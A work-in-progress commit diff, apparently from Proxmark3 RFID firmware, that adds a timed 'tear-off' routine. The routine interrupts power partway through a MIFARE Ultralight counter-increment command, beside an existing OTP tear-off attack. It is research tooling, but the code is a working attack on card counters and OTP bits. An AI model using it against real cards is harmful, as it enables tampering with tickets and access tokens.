WIP - hf mfu countertear ...

2020-10-12 19:08:29 +02:00
parent acada02e37
commit 7cfbdcbae9
5 changed files with 197 additions and 7 deletions
--- a/armsrc/appmain.c
+++ b/armsrc/appmain.c
@@ -1473,6 +1473,15 @@ static void PacketReceived(PacketCommandNG *packet) {
            MifareU_Otp_Tearoff(packet->oldarg[0], packet->oldarg[1], packet->data.asBytes);
            break;
        }
+        case CMD_HF_MFU_COUNTER_TEAROFF: {            
+            struct p {
+                uint8_t counter;
+                uint32_t tearoff_time;
+            } PACKED;
+            struct p *payload = (struct p *) packet->data.asBytes;             
+            MifareU_Counter_Tearoff(payload->counter, payload->tearoff_time);
+            break;
+        }
        case CMD_HF_MIFARE_STATIC_NONCE: {
            MifareHasStaticNonce();
            break;
--- a/armsrc/mifarecmd.c
+++ b/armsrc/mifarecmd.c
@@ -2695,9 +2695,8 @@ void Mifare_DES_Auth2(uint32_t arg0, uint8_t *datain) {
 //
 // Tear-off attack against MFU.
 // - Moebius et al
-void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {
+void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t tearoff_time, uint8_t *datain) {
    uint8_t blockNo = arg0;
-    uint32_t tearOffTime = arg1;
    uint8_t data_fullwrite[4] = {0x00};
    uint8_t data_testwrite[4] = {0x00};
    memcpy(data_fullwrite, datain, 4);
@@ -2705,8 +2704,8 @@ void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {

    if (DBGLEVEL >= DBG_DEBUG) DbpString("Preparing OTP tear-off");

-    if (tearOffTime > 43000)
-        tearOffTime = 43000;
+    if (tearoff_time > 43000)
+        tearoff_time = 43000;

    MifareUWriteBlock(blockNo, 0, data_fullwrite);

@@ -2732,9 +2731,50 @@ void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {
    // Wait before cutting power.  aka tear-off
    LED_D_ON();

-    SpinDelayUsPrecision(tearOffTime);
+    SpinDelayUsPrecision(tearoff_time);
    if (DBGLEVEL >= DBG_DEBUG) Dbprintf(_YELLOW_("OTP tear-off triggered!"));
    switch_off();

    reply_ng(CMD_HF_MFU_OTP_TEAROFF, PM3_SUCCESS, NULL, 0);
 }
+
+//
+// Tear-off attack against MFU counter
+void MifareU_Counter_Tearoff(uint8_t counter, uint32_t tearoff_time) {
+
+    if (tearoff_time > 43000)
+        tearoff_time = 43000;
+
+    LEDsoff();
+    iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
+    clear_trace();
+    set_tracing(true);
+
+    // Send MFU counter increase cmd
+    uint8_t cmd[] = {
+            MIFARE_ULEV1_INCR_CNT,
+            counter,
+            0,  // lsb
+            0,  
+            0,  // msb
+            0,  // rfu
+            0,
+            0,
+        };
+    AddCrc14A(cmd, sizeof(cmd) - 2);
+
+    // anticollision / select card
+    if (!iso14443a_select_card(NULL, NULL, NULL, true, 0, true)) {
+        if (DBGLEVEL >= DBG_ERROR) Dbprintf("Can't select card");
+        OnError(1);
+        return;
+    };
+
+    // send
+    ReaderTransmit(cmd, sizeof(cmd), NULL);
+    LED_D_ON();
+    SpinDelayUsPrecision(tearoff_time);
+    switch_off();
+
+    reply_ng(CMD_HF_MFU_COUNTER_TEAROFF, PM3_SUCCESS, NULL, 0);
+}
--- a/armsrc/mifarecmd.h
+++ b/armsrc/mifarecmd.h
@@ -64,5 +64,5 @@ void Mifare_DES_Auth2(uint32_t arg0, uint8_t *datain);

 // Tear-off test for MFU
 void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain);
-
+void MifareU_Counter_Tearoff(uint8_t counter, uint32_t tearoff_time);
 #endif